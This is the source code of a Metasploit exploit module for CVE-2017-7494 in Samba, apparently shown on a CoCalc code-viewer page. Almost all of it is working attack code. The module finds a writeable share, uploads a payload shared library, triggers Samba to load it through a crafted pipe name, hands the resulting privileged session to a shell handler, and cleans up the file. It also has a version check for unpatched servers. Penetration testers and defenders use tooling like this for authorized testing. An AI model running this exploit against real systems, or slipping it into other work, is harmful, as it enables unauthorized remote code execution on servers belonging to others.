Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/samba/is_known_pipename.rb
32905 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::SMB::Client

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Samba is_known_pipename() Arbitrary Module Load',

17
        'Description' => %q{

18
          This module triggers an arbitrary shared library load vulnerability

19
          in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module

20
          requires valid credentials, a writeable folder in an accessible share,

21
          and knowledge of the server-side path of the writeable folder. In

22
          some cases, anonymous access combined with common filesystem locations

23
          can be used to automatically exploit this vulnerability.

24
        },

25
        'Author' => [

26
          'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery & Python Exploit

27
          'hdm', # Metasploit Module

28
          'bcoles', # Check logic

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          [ 'CVE', '2017-7494' ],

33
          [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],

34
          [ 'ATT&CK', Mitre::Attack::Technique::T1083_FILE_AND_DIRECTORY_DISCOVERY ],

35
          [ 'ATT&CK', Mitre::Attack::Technique::T1135_NETWORK_SHARE_DISCOVERY ],

36
          [ 'ATT&CK', Mitre::Attack::Technique::T1592_002_SOFTWARE ],

37
          [ 'ATT&CK', Mitre::Attack::Technique::T1055_001_DYNAMIC_LINK_LIBRARY_INJECTION ]

38
        ],

39
        'Payload' => {

40
          'Space' => 9000,

41
          'DisableNops' => true

42
        },

43
        'Platform' => 'linux',

44
        'Targets' => [

45


46
          [

47
            'Automatic (Interact)',

48
            {

49
              'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'Interact' => true,

50
              'Payload' => {

51
                'Compat' => {

52
                  'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find'

53
                }

54
              }

55
            }

56
          ],

57
          [

58
            'Automatic (Command)',

59
            { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }

60
          ],

61
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],

62
          [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],

63
          [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],

64
          [ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],

65
          [ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],

66
          [ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],

67
          [ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],

68
          [ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],

69
          [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],

70
          [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],

71
          [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],

72
          [ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],

73
          [ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],

74
          [ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],

75
        ],

76
        'DefaultOptions' => {

77
          'DCERPC::fake_bind_multi' => false,

78
          'SHELL' => '/bin/sh'

79
        },

80
        'Privileged' => true,

81
        'DisclosureDate' => '2017-03-24',

82
        'DefaultTarget' => 0,

83
        'Notes' => {

84
          'Stability' => [CRASH_SAFE],

85
          'SideEffects' => [IOC_IN_LOGS],

86
          'Reliability' => [REPEATABLE_SESSION]

87
        }

88
      )

89
    )

90


91
    register_options(

92
      [

93
        OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),

94
        OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),

95
      ]

96
    )

97
  end

98


99
  def post_auth?

100
    true

101
  end

102


103
  # Setup our mapping of Metasploit architectures to gcc architectures

104
  def setup

105
    super

106
    @payload_arch_mappings = {

107
      ARCH_X86 => [ 'x86' ],

108
      ARCH_X64 => [ 'x86_64' ],

109
      ARCH_MIPS => [ 'mips' ],

110
      ARCH_MIPSLE => [ 'mipsel' ],

111
      ARCH_MIPSBE => [ 'mips' ],

112
      ARCH_MIPS64 => [ 'mips64' ],

113
      ARCH_MIPS64LE => [ 'mips64el' ],

114
      ARCH_PPC => [ 'powerpc' ],

115
      ARCH_PPC64 => [ 'powerpc64' ],

116
      ARCH_PPC64LE => [ 'powerpc64le' ],

117
      ARCH_SPARC => [ 'sparc' ],

118
      ARCH_SPARC64 => [ 'sparc64' ],

119
      ARCH_ARMLE => [ 'armel', 'armhf' ],

120
      ARCH_AARCH64 => [ 'aarch64' ],

121
      ARCH_ZARCH => [ 's390x' ]

122
    }

123


124
    # Architectures we don't offically support but can shell anyways with interact

125
    @payload_arch_bonus = %w[

126
      mips64el sparc64 s390x

127
    ]

128


129
    # General platforms (OS + C library)

130
    @payload_platforms = %w[

131
      linux-glibc

132
    ]

133
  end

134


135
  # List all top-level directories within a given share

136
  def enumerate_directories(share)

137
    vprint_status('Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client')

138
    connect(versions: [1])

139
    smb_login

140
    simple.connect("\\\\#{rhost}\\#{share}")

141
    stuff = simple.client.find_first('\\*')

142
    directories = ['']

143
    stuff.each_pair do |entry, entry_attr|

144
      next if %w[. ..].include?(entry)

145
      next unless entry_attr['type'] == 'D'

146


147
      directories << entry

148
    end

149


150
    return directories

151
  rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e

152
    vprint_error("Enum #{share}: #{e}")

153
    return nil

154
  ensure

155
    simple.disconnect("\\\\#{rhost}\\#{share}")

156
    smb_connect

157
  end

158


159
  # Determine whether a directory in a share is writeable

160
  def verify_writeable_directory(share, directory = '')

161
    simple.connect("\\\\#{rhost}\\#{share}")

162


163
    random_filename = Rex::Text.rand_text_alpha(5) + '.txt'

164
    filename = directory.empty? ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}"

165


166
    wfd = simple.open(filename, 'rwct')

167
    wfd << Rex::Text.rand_text_alpha(8)

168
    wfd.close

169


170
    simple.delete(filename)

171
    return true

172
  rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e

173
    vprint_error("Write #{share}#{filename}: #{e}")

174
    return false

175
  ensure

176
    simple.disconnect("\\\\#{rhost}\\#{share}")

177
  end

178


179
  # Call NetShareGetInfo to retrieve the server-side path

180
  def find_share_path

181
    share_info = smb_netsharegetinfo(@share)

182
    share_info[:path].gsub('\\', '/').sub(/^.*:/, '')

183
  end

184


185
  # Crawl top-level directories and test for writeable

186
  def find_writeable_path(share)

187
    subdirs = enumerate_directories(share)

188
    return unless subdirs

189


190
    if !datastore['SMB_FOLDER'].to_s.empty?

191
      subdirs.unshift(datastore['SMB_FOLDER'])

192
    end

193


194
    subdirs.each do |subdir|

195
      next unless verify_writeable_directory(share, subdir)

196


197
      return subdir

198
    end

199


200
    nil

201
  end

202


203
  # Locate a writeable directory across identified shares

204
  def find_writeable_share_path

205
    @path = nil

206
    share_info = smb_netshareenumall

207
    if datastore['SMB_SHARE_NAME'].blank?

208
      share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']

209
    end

210


211
    share_info.each do |share|

212
      next if share.blank?

213
      next if share.first.blank?

214
      next if share.first.upcase == 'IPC$'

215


216
      found = find_writeable_path(share.first)

217
      next unless found

218


219
      @share = share.first

220
      @path = found

221
      break

222
    end

223
  end

224


225
  # Locate a writeable share

226
  def find_writeable

227
    find_writeable_share_path

228
    unless @share && @path

229
      print_error('No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER')

230
      fail_with(Failure::NoTarget, 'No matching target')

231
    end

232
    print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")

233
  end

234


235
  # Store the wrapped payload into the writeable share

236
  def upload_payload(wrapped_payload)

237
    begin

238
      simple.connect("\\\\#{rhost}\\#{@share}")

239


240
      random_filename = Rex::Text.rand_text_alpha(8) + '.so'

241
      filename = @path.empty? ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"

242


243
      wfd = simple.open(filename, 'rwct')

244
      wfd << wrapped_payload

245
      wfd.close

246


247
      @payload_name = random_filename

248
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e

249
      print_error("Write #{@share}#{filename}: #{e}")

250
      return false

251
    ensure

252
      simple.disconnect("\\\\#{rhost}\\#{@share}")

253
    end

254


255
    print_status("Uploaded payload to \\\\#{rhost}\\#{@share}#{filename}")

256
    return true

257
  end

258


259
  # Try both pipe open formats in order to load the uploaded shared library

260
  def trigger_payload

261
    target = [@share_path, @path, @payload_name].join('/').gsub(%r{/+}, '/')

262
    [

263
      '\\\\PIPE\\' + target,

264
      target

265
    ].each do |tpath|

266
      print_status("Loading the payload from server-side path #{target} using #{tpath}...")

267


268
      smb_connect

269


270
      # Try to execute the shared library from the share

271
      begin

272
        simple.client.create_pipe(tpath)

273
        probe_module_path(tpath)

274
      rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError

275
        # Common errors we can safely ignore

276
      rescue Rex::Proto::SMB::Exceptions::ErrorCode => e

277
        # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded

278
        if e.error_code == 0xc0000039

279
          pwn

280
          return true

281
        else

282
          print_error("  >> Failed to load #{e.error_name}")

283
        end

284
      rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e

285
        if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID

286
          pwn

287
          return true

288
        else

289
          print_error("  >> Failed to load #{e.status_code.name}")

290
        end

291
      end

292


293
      disconnect

294
    end

295


296
    false

297
  end

298


299
  def pwn

300
    print_good('Probe response indicates the interactive payload was loaded...')

301
    smb_shell = sock

302
    self.sock = nil

303
    remove_socket(sock)

304
    handler(smb_shell)

305
  end

306


307
  # Use fancy payload wrappers to make exploitation a joyously lazy exercise

308
  def cycle_possible_payloads

309
    template_base = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2017-7494')

310
    template_list = []

311
    template_type = nil

312


313
    # Handle the generic command types first

314
    if target.arch.include?(ARCH_CMD)

315
      template_type = target['Interact'] ? 'findsock' : 'system'

316


317
      all_architectures = @payload_arch_mappings.values.flatten.uniq

318


319
      # Include our bonus architectures for the interact payload

320
      if target['Interact']

321
        @payload_arch_bonus.each do |t_arch|

322
          all_architectures << t_arch

323
        end

324
      end

325


326
      # Prioritize the most common architectures first

327
      %w[x86_64 x86 armel armhf mips mipsel].each do |t_arch|

328
        template_list << all_architectures.delete(t_arch)

329
      end

330


331
      # Queue up the rest for later

332
      all_architectures.each do |t_arch|

333
        template_list << t_arch

334
      end

335


336
    # Handle the specific architecture targets next

337
    else

338
      template_type = 'shellcode'

339
      target.arch.each do |t_name|

340
        @payload_arch_mappings[t_name].each do |t_arch|

341
          template_list << t_arch

342
        end

343
      end

344
    end

345


346
    # Remove any duplicates that mau have snuck in

347
    template_list.uniq!

348


349
    # Cycle through each top-level platform we know about

350
    @payload_platforms.each do |t_plat|

351
      # Cycle through each template and yield

352
      template_list.each do |t_arch|

353
        wrapper_path = ::File.join(template_base, "samba-root-#{template_type}-#{t_plat}-#{t_arch}.so.gz")

354
        next unless ::File.exist?(wrapper_path)

355


356
        data = ''

357
        ::File.open(wrapper_path, 'rb') do |fd|

358
          data = Rex::Text.ungzip(fd.read)

359
        end

360


361
        pidx = data.index('PAYLOAD')

362
        if pidx

363
          data[pidx, payload.encoded.length] = payload.encoded

364
        end

365


366
        vprint_status("Using payload wrapper 'samba-root-#{template_type}-#{t_arch}'...")

367
        yield(data)

368
      end

369
    end

370
  end

371


372
  # Verify that the payload settings make sense

373
  def sanity_check

374
    if target['Interact'] && datastore['PAYLOAD'] != 'cmd/unix/interact'

375
      print_error('Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact')

376
      print_error('       Please set PAYLOAD to cmd/unix/interact and try this again')

377
      print_error('')

378
      fail_with(Failure::NoTarget, 'Invalid payload chosen for the interactive target')

379
    end

380


381
    if !target['Interact'] && datastore['PAYLOAD'] == 'cmd/unix/interact'

382
      print_error('Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact')

383
      print_error('       Please set a valid PAYLOAD and try this again')

384
      print_error('')

385
      fail_with(Failure::NoTarget, 'Invalid payload chosen for the non-interactive target')

386
    end

387
  end

388


389
  # Shorthand for connect and login

390
  def smb_connect

391
    connect

392
    smb_login

393
  end

394


395
  # Start the shell train

396
  def exploit

397
    # Validate settings

398
    sanity_check

399


400
    # Setup SMB

401
    smb_connect

402


403
    # Find a writeable share

404
    find_writeable

405


406
    # Retrieve the server-side path of the share like a boss

407
    print_status("Retrieving the remote path of the share '#{@share}'")

408
    @share_path = find_share_path

409
    print_status("Share '#{@share}' has server-side path '#{@share_path}")

410


411
    # Disconnect

412
    disconnect

413


414
    # Create wrappers for each potential architecture

415
    cycle_possible_payloads do |wrapped_payload|

416
      # Connect, upload the shared library payload, disconnect

417
      smb_connect

418
      upload_payload(wrapped_payload)

419
      disconnect

420


421
      # Trigger the payload

422
      early = trigger_payload

423


424
      # Cleanup the payload

425
      begin

426
        smb_connect

427
        simple.connect("\\\\#{rhost}\\#{@share}")

428
        uploaded_path = @path.empty? ? "\\#{@payload_name}" : "\\#{@path}\\#{@payload_name}"

429
        simple.delete(uploaded_path)

430
        disconnect

431
      rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError => e

432
        vprint_error(e.message)

433
      end

434


435
      # Bail early if our interact payload loaded

436
      return if early

437
    end

438
  end

439


440
  # A version-based vulnerability check for Samba

441
  def check

442
    res = smb_fingerprint

443


444
    unless res['native_lm'] =~ /Samba ([\d.]+)/

445
      print_error("does not appear to be Samba: #{res['os']} / #{res['native_lm']}")

446
      return CheckCode::Safe

447
    end

448


449
    samba_version = Rex::Version.new(::Regexp.last_match(1).gsub(/\.$/, ''))

450


451
    vprint_status("Samba version identified as #{samba_version}")

452


453
    if samba_version < Rex::Version.new('3.5.0')

454
      return CheckCode::Safe

455
    end

456


457
    # Patched in 4.4.14

458
    if samba_version < Rex::Version.new('4.5.0') &&

459
       samba_version >= Rex::Version.new('4.4.14')

460
      return CheckCode::Safe

461
    end

462


463
    # Patched in 4.5.10

464
    if samba_version > Rex::Version.new('4.5.0') &&

465
       samba_version < Rex::Version.new('4.6.0') &&

466
       samba_version >= Rex::Version.new('4.5.10')

467
      return CheckCode::Safe

468
    end

469


470
    # Patched in 4.6.4

471
    if samba_version >= Rex::Version.new('4.6.4')

472
      return CheckCode::Safe

473
    end

474


475
    smb_connect

476
    find_writeable_share_path

477
    disconnect

478


479
    if @share.to_s.empty?

480
      return CheckCode::Detected("Samba version #{samba_version} found, but no writeable share has been identified")

481
    end

482


483
    return CheckCode::Appears("Samba version #{samba_version} found with writeable share '#{@share}'")

484
  end

485
end

486


487